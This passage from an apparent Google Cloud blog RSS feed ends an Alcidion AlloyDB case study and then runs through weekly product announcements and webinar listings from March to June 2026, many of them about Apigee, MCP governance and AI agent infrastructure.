&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;Future vision: AI and beyond&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alcidion isn't stopping at database modernization. The move to AlloyDB is a foundational step for their next phase of growth:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;AlloyDB columnar engine:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The team is exploring the columnar engine for a second round of query optimization and real-time analytics.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Generative AI apps:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Alcidion is actively working with Google to use AlloyDB’s &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/introducing-gemini-enterprise-agent-platform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; integration to perform concept analysis and pick out critical clinical insights from vast datasets.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By moving to AlloyDB, Alcidion has improved its stability and performance and built a strong foundation to keep delivering smarter, safer care to hospitals worldwide.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Ready to modernize your database?&lt;/strong&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; Learn more about how&lt;/span&gt;&lt;a href="https://cloud.google.com/alloydb"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; can transform your operational workloads.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Mon, 08 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/databases/modernizing-healthcare-how-alcidion-achieved-greater-stability-and-performance/</guid><category>AI &amp; Machine Learning</category><category>Data Analytics</category><category>Customers</category><category>Databases</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Alcidion-Hero.max-600x600.png" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Modernizing Healthcare: How Alcidion achieved greater stability and performance with AlloyDB</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/Alcidion-Hero.max-600x600.png</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/databases/modernizing-healthcare-how-alcidion-achieved-greater-stability-and-performance/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Raj Pai</name><title>VP, Google Databases</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Stephen Ridley</name><title>Alcidion, Director of SRE and Platform Operations</title><department></department><company></company></author></item><item><title>What’s new with Google Cloud</title><link>https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/</link><description>&lt;div class="block-paragraph"&gt;&lt;p data-block-key="kgod7"&gt;Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. &lt;/p&gt;&lt;hr/&gt;&lt;p data-block-key="ru1z9"&gt;&lt;b&gt;Tip&lt;/b&gt;: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: &lt;a href="https://cloud.google.com/blog/topics/inside-google-cloud/complete-list-google-cloud-blog-links-2021"&gt;Google Cloud blog 101: Full list of topics, links, and resources&lt;/a&gt;.&lt;/p&gt;&lt;hr/&gt;&lt;p data-block-key="b0lnw"&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: []&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Jun 1 - Jun 5&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Modeling the physical world with BigQuery Graph&lt;/strong&gt;&lt;br/&gt;Managing complex supply chains requires more than just spreadsheets; it requires a digital replica of the physical world. In this &lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://cloud.google.com/blog/products/data-analytics/modeling-a-digital-twin-using-bigquery-graph" rel="noreferrer noopener" target="_blank"&gt;post&lt;/a&gt;, Guru Rangavittal and Candice Chen explore how BigQuery Graph enables organizations to build a digital twin by turning physical assets into an interconnected map of nodes and edges. By moving beyond traditional relational databases, businesses gain real-time clarity into operations—from executing surgical ingredient recalls to analyzing weather-driven logistics risks. Discover how BigQuery Graph transforms reactive firefighting into proactive, precision modeling, allowing you to see critical connections in seconds and future-proof your supply chain.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Apigee for AI: Govern LLMs and MCP Servers (Presented in Spanish)&lt;br/&gt;&lt;/strong&gt;Learn how to securely transition your AI initiatives from experimental prototypes to enterprise-ready deployments. Join Luis Cuellar on June 18 for a technical deep dive (presented in Spanish) exploring Apigee’s latest AI gateway capabilities. Discover how to centralize governance over Model Context Protocol (MCP) servers, protect Large Language Models (LLMs) with robust API gateway security policies, and manage token-based quotas.&lt;br/&gt;&lt;br/&gt;&lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4dyC2Ie" rel="noreferrer noopener" target="_blank"&gt;&lt;strong&gt;Register for the June 18 Spanish Community TechTalk&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;May 25 - May 29&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.anthropic.com/news/claude-opus-4-8" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Anthropic’s Claude Opus 4.8&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is now available on &lt;/span&gt;&lt;a href="https://console.cloud.google.com/vertex-ai/publishers/anthropic/model-garden/claude-opus-4-8"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;. &lt;/strong&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;As we continue to expand our platform's model offerings, this addition gives organizations more options for handling complex, multi-stage enterprise workflows. Claude Opus 4.8 brings strong capabilities in agentic coding, allowing developers to manage extensive refactors and tracking dependencies over extended sessions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;API Horizon Munich July 6, 2026: Orchestrating the Next Era of AI and APIs &lt;br/&gt;&lt;/strong&gt;Master the orchestration of next-gen AI and digital ecosystems. Join Google Cloud experts and DACH tech leaders on July 6 for an exclusive look at the Apigee roadmap, Agent Management, and Model Context Protocol (MCP). Gain real-world insights and connect with the regional integration community.&lt;strong&gt;&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/4dTxQmo" rel="noopener" target="_blank"&gt;Register now&lt;/a&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Securing AI Agents: The Extended Agent Gateway Pattern&lt;br/&gt;&lt;/strong&gt;Learn how to prevent autonomous AI agents from invoking unauthorized APIs. Join Apigee Specialist Joel Gauci on June 4 for a technical deep dive into the Extended Agent Gateway pattern. This session covers enforcing Fine-Grained Authorization (FGA), implementing secure token exchange, and establishing Model Context Protocol (MCP) governance at the API gateway layer to protect enterprise backend services.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/4fbAsxg" rel="noopener" target="_blank"&gt;&lt;strong&gt;Register for the June 4 Community TechTalk&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;API-to-Agent Security: Exposing REST APIs to Gemini Enterprise via MCP&lt;br/&gt;&lt;/strong&gt;Connect Gemini Enterprise agents to core data without creating security hazards. Join Google Cloud Specialist Nigel Walters on June 11 to learn how to instantly transform legacy REST APIs into secure Model Context Protocol (MCP) servers. We’ll cover how to safely register tools with Gemini while enforcing gateway-level guardrails like rate limiting and access control policies.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/4nVyjIr" rel="noopener" target="_blank"&gt;&lt;strong&gt;Register for the June 11 Community TechTalk&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;May 18 - May 22&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Chinese Webinar | June 4: AI Command and Control&lt;br/&gt;&lt;/strong&gt;As AI agents move from experimental pilots to core enterprise functions, governance has become a critical next step. Join Google Cloud on June 4th at 10:00 AM (Beijing Time) to learn how to build a secure AI management layer architecture. We'll explore how to develop governed MCP (Model Context Protocol) endpoints, manage tool access to enterprise data, and leverage robust audit logs to operationalize AI. This session also includes a practical demonstration of these governance frameworks on Google Cloud.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/4dx4Lf5" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;Register here&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;GCP Announces New Features to Benchmark and Optimize LLMs for On-Device Use Cases&lt;br/&gt;&lt;/strong&gt;Deploying fine-tuned LLMs from GCP to edge devices like smartphones is complex due to fragmented hardware. Google AI Edge Portal bridges this gap, giving GCP developers the ability to test AI performance on 120+ Android devices, representing the full diversity of high, medium, and low tier smartphones on the market today. This week at I/O, we announced brand new &lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/benchmark-llms-on-device-with-ai-edge-portal" rel="noopener" target="_blank"&gt;capabilities&lt;/a&gt; to benchmark and debug LLM performance across these devices. &lt;a href="https://docs.google.com/forms/d/e/1FAIpQLSfTcGPycQve8TLAsfH46pBlXBZe9FrgJAClwbF7DeL1LgVn4Q/viewform" rel="noopener" target="_blank"&gt;Sign-up&lt;/a&gt; to utilize these new features in private preview today.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;May 11 - May 15&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Build Your AI &amp;amp; MCP Control Tower for Universal Governance&lt;br/&gt;&lt;/strong&gt;Master the future of agentic security with Apigee. Join our Community TechTalk on May 21 to discover how Apigee serves as a central "Control Tower" for the Model Context Protocol (MCP). We will explore how new JSON-RPC tool authorization enables fine-grained access policies across your organization, ensuring secure and scalable AI deployments. Whether managing internal tools or external users, learn to govern your agentic ecosystem with absolute precision. This session is designed for global coverage across EMEA and AMER regions.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/4u9slWF" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;Register for the May 21 Community TechTalk&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Apr 27 - May 1&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Master Your Launch: The Apigee Production Go-Live Checklist&lt;br/&gt;&lt;/strong&gt;Ensure a secure launch with the Apigee production guide. Join Nicola Cardace on May 28 to explore security guardrails, including IAM roles, mTLS configurations, and encrypted KVM migrations. Scheduled at 11 AM EDT / 5 PM CEST to support EMEA and AMER teams, this TechTalk provides the technical roadmap you need to flip the switch with absolute confidence.&lt;br/&gt;&lt;br/&gt;&lt;strong style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;a href="https://goo.gle/4elMCTI" rel="noopener" target="_blank"&gt;Register for the May 28 Community TechTalk&lt;/a&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Transforming APIs into Governed Agentic Tools on the Google Cloud Agentic Platform&lt;br/&gt;&lt;/strong&gt;&lt;span style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;Turn your APIs into secure, governed agentic tools on the Google Cloud Agentic Platform. Join Specialist Christophe Lalevée on May 7 for a technical deep dive into AI productization. Scheduled at 5 PM CEST / 11 AM EDT to maximize coverage for developers across EMEA and AMER, this session explores the integration and governance frameworks required to scale enterprise-ready AI with confidence.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://goo.gle/3PfWm7M" rel="noopener" target="_blank"&gt;Register for the May 7 Community TechTalk&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/accelerator-optimized-machines#g4-machine-types" rel="noopener" target="_blank"&gt;Fractional G4 VMs&lt;/a&gt; are Generaly Available, providing a highly efficient and cost-effective entry point for AI and graphics workloads. These new configurations, using NVIDIA virtual GPU (vGPU) technology, allow you to leverage the power of the NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs in flexible, smaller increments, so you can right-size your infrastructure to match the specific demands of your applications. By providing more granular access to advanced hardware, fractional G4 VMs let you optimize resource allocation and reduce overhead without sacrificing performance. You can now select from additional GPU slice sizes for your specific needs:
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;1/2 GPU:&lt;/strong&gt; Ideal for more intensive tasks such as LLM inference, robotics sensor simulation, and high-fidelity 3D rendering.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;1/4 GPU:&lt;/strong&gt; Optimized for mainstream workloads, including mid-range creative design, video transcoding, and real-time data visualization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;1/8 GPU:&lt;/strong&gt; Great for lightweight applications such as remote desktops, productivity tools, and entry-level streaming services.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Transitioning AI from a sandbox prototype to an enterprise-grade system is a major hurdle. A monolithic script won't suffice for widespread deployment. To achieve true scale and reliability with Gemini, organizations must adopt service-oriented micro-agent architectures, establish Zero-Trust security, and implement rigorous EvalOps. Master the "Agentic Maturity Ladder" to ensure your AI &amp;amp; Agentic solutions are robust, secure, and ready for the real world.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://lnkd.in/gHBH8cTv" rel="noopener" target="_blank"&gt;Watch the deep dive&lt;/a&gt; and &lt;a href="https://discuss.google.dev/t/beyond-the-prototype-scaling-production-grade-agents-with-gemini/356140" rel="noopener" target="_blank"&gt;read the developer blog&lt;/a&gt; to learn more.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ML Development in VS Code with Google Cloud Power: Workbench Extension Now Available&lt;br/&gt;&lt;/strong&gt;Data scientists and developers can now combine the local productivity of VS Code with the scalable infrastructure of Google Cloud. The new Google Cloud Workbench Notebooks extension allows you to connect to and run notebooks on managed cloud environments directly within your local IDE. This integration streamlines the ML lifecycle by eliminating context switching and providing high-performance compute for complex workloads in a familiar interface. As part of our commitment to the developer ecosystem, the extension is fully open-sourced to support community-driven innovation.
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Install from Marketplace:&lt;/strong&gt; &lt;a href="https://marketplace.visualstudio.com/items?itemName=GoogleCloudTools.workbench-notebooks" rel="noopener" target="_blank"&gt;GoogleCloudTools.workbench-notebooks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Contribute on GitHub:&lt;/strong&gt; &lt;a href="https://github.com/GoogleCloudPlatform/colab-enterprise-vscode" rel="noopener" target="_blank"&gt;colab-enterprise-vscode&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Apr 20 - Apr 24&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Announcing the 2026 Google Cloud Partners of the Year&lt;br/&gt;&lt;/strong&gt;Google Cloud is honored to celebrate the winners of the 2026 Partner of the Year awards! These awards recognize an exceptional group of partners across AI, Security, Infrastructure, and more, who have demonstrated a commitment to customer success. From global system integrators to specialized startups, these winners are leveraging the power of Google Cloud to solve complex challenges and drive digital transformation worldwide. Join us in congratulating these organizations for their innovation, collaboration, and impactful results over the past year.&lt;br/&gt;&lt;br/&gt;See the &lt;a href="https://cloud.google.com/blog/topics/partners/2026-partners-of-the-year-winners-next26"&gt;2026 Partner Award winners&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Apr 13 - Apr 17&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;We're excited to announce the &lt;strong&gt;Public Preview of Datastream’s metadata integration with Knowledge Catalog&lt;/strong&gt;. This is the first step in our vision to provide a centralized, "single pane of glass" for all Datastream assets. The enhancement automatically synchronizes Streams, Connection Profiles, and Private Connections, eliminating data silos. It enhances discoverability, allowing you to search for Datastream assets using the same interface as BigQuery tables. Centralized governance is also provided, making your real-time data estate more transparent and easier to manage.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Upgrading Apigee OPDK to 4.53 with OS Modernization&lt;br/&gt;&lt;/strong&gt;Modernize your infrastructure using Google’s official, sequential upgrade path. Our Technical expert, Rakesh Talanki outlines how to upgrade Apigee OPDK to v4.53 while migrating to a supported OS (RHEL 8.x/9.x). This guide covers the "build-out" methodology, including multi-data center syncing, to ensure a stable, zero-downtime transition&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/3Oa8uqy" rel="noopener" target="_blank"&gt;Read the guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud Run Worker Pools and CREMA: Powering Serverless AI at Scale&lt;br/&gt;&lt;/strong&gt;Google Cloud has announced the General Availability of &lt;strong&gt;Cloud Run worker pools&lt;/strong&gt;, a new resource type designed specifically for pull-based, non-HTTP workloads. Unlike traditional Cloud Run services that scale based on request traffic, worker pools provide an "always-on" environment for background tasks like processing message queues or running large-scale AI inference. To support this, Google Cloud also open-sourced the &lt;strong&gt;Cloud Run External Metrics Autoscaler (CREMA)&lt;/strong&gt;. Built on KEDA, CREMA enables queue-aware autoscaling for worker pools, allowing them to dynamically scale based on external signals like Pub/Sub backlog or Kafka lag.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Apigee Model Context Protocol (MCP) now Generally Available&lt;br/&gt;&lt;/strong&gt;Expose enterprise APIs as MCP tools for agentic AI applications with the General Availability of MCP in Apigee. This update allows developers to transform APIs into AI-ready tools using OpenAPI Specifications, removing the need for local MCP servers or additional infrastructure. With managed endpoints and semantic search in API hub, you can now provide AI agents with secure, governed access to enterprise data at scale.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/3QfoEQ4" rel="noopener" target="_blank"&gt;&lt;em&gt;Explore the MCP overview&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Apr 6 - Apr 10&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Community TechTalk: Powering Retail Agents with ADK, UCP &amp;amp; Apigee X&lt;br/&gt;&lt;/strong&gt;Move beyond basic chatbots to secure, transactional AI experiences. Join our Community TechTalk on April 16 to learn how Apigee X and Gemini build a "Trust Layer" for AI shopping assistants using UCP standards. We’ll demonstrate how to block prompt injections with Model Armor and implement cost governance via token limits to secure the path from discovery to purchase.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/41ocUgq" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;Register for the TechTalk&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Implement multimodal capabilities in your AI agents&lt;br/&gt;&lt;/strong&gt;Explore three new reference architectures for building sophisticated multi-agent AI systems that can process and analyze multimodal data. To analyze disparate multimodal data and produce a high-confidence classification, see &lt;a href="https://docs.cloud.google.com/architecture/agentic-ai-classify-multimodal-data" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;span style="vertical-align: baseline;"&gt;Classify multimodal data&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. To create a fluid conversational AI that processes audio and video streams in real time, see&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/architecture/agentic-ai-bidirectional-multimodal-streaming" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable live bidirectional multimodal streaming&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. To consolidate fragmented multimodal data into a searchable knowledge graph, see&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/architecture/agentic-ai-multimodal-graph-rag-resource-orchestration" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;span style="vertical-align: baseline;"&gt;Multimodal GraphRAG resource orchestration&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Automate SecOps workflows with an agentic AI system&lt;br/&gt;&lt;/strong&gt;To accelerate incident response and reduce manual toil for your security team, you need a system that can automate remediation playbooks. Our new reference architecture helps you build an AI agent that orchestrates complex triage and investigation workflows across disparate security tools, such as SIEM, CSPM, and EDR, from a single interface. See the full guide to &lt;a href="https://docs.cloud.google.com/architecture/agentic-ai-orchestrate-security-ops-workflows" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;span style="vertical-align: baseline;"&gt;orchestrate security operations workflows&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Mar 30 - Apr 3&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;ASEAN Webinar | April 30: Mastering Agentic Governance at Scale with GCP&lt;br/&gt;&lt;/strong&gt;As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud experts &lt;strong&gt;Shilpi Puri &amp;amp; Wely Lau&lt;/strong&gt; for a &lt;strong&gt;webinar&lt;/strong&gt; on &lt;strong&gt;April 30th at 11:00 AM SGT&lt;/strong&gt; to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/47FX1Wn" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;strong&gt;RSVP here.&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Mar 23 - Mar 27&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Turn your API sprawl into an agent-ready catalog&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;As organizations scale, APIs often become scattered across multiple gateways, creating "blind spots" that hinder AI adoption. To solve this, we’ve introduced two new capabilities for Apigee API hub: a new integration with API Gateway to automatically centralize API metadata into a single control plane, and a specification boost add-on (now in public preview). This add-on uses AI to enhance your API documentation with the precise examples and error codes that AI agents need to function reliably.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://goo.gle/47dEYqc" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Read the full blog post to get started.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Webinar | April 16: AI Command &amp;amp; Control&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud expert Satyam Maloo for a webinar on April 16th at 11:00 AM IST to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://goo.gle/4t43Vg4" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;RSVP here.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Modernizing and Decoupling Event Ingestion with Apigee&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In modern cloud-native architectures, decoupling producers from consumers is critical for building resilient systems. While Google Cloud Pub/Sub provides a scalable backbone, exposing it directly to external clients can introduce security and management overhead. This new guide explores how to leverage Apigee as an intelligent HTTP ingestion point. Learn how to handle security, mediation, and traffic control before messages reach your internal bus using the PublishMessage policy or Pub/Sub API.&lt;/span&gt;&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/3POgsWF" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Read the full guide.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Mar 16 - Mar 20&lt;/h3&gt;
&lt;ul&gt;
